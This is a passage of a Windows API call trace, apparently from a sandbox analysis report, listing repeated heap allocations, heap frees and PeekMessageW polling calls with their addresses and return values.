dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.545] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.546] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.546] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.546] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.546] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.546] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.547] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.547] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.547] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.547] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b48 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.548] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.548] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.548] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.548] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.548] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.549] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.549] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.549] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.550] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.551] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.552] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 